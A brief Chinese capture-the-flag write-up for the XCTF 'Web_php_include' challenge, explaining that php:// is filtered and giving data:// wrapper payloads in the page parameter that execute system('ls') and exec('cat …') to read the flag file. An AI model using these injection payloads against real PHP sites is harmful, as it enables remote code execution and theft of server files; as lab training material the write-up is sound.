攻防世界-Web_php_include(data协议)

一道简单的文件包含题目

 

 分析代码可知php://被ban了

 

此题可以用data://协议

payload为（以下两者皆可使用）

?page=data://text/plain,<?php%20system('ls')?>
?page=data://text/plain,<?php%20exec('ls',$a);var_dump($a)?>

 

可以看到当前目录下有一个fl4gisisish3r3.php，直接cat查看?page=data://text/plain,<?php%20exec('cat fl4gisisish3r3.php',$a);var_dump($a)?>

 

 

 cat查看文件后得到flag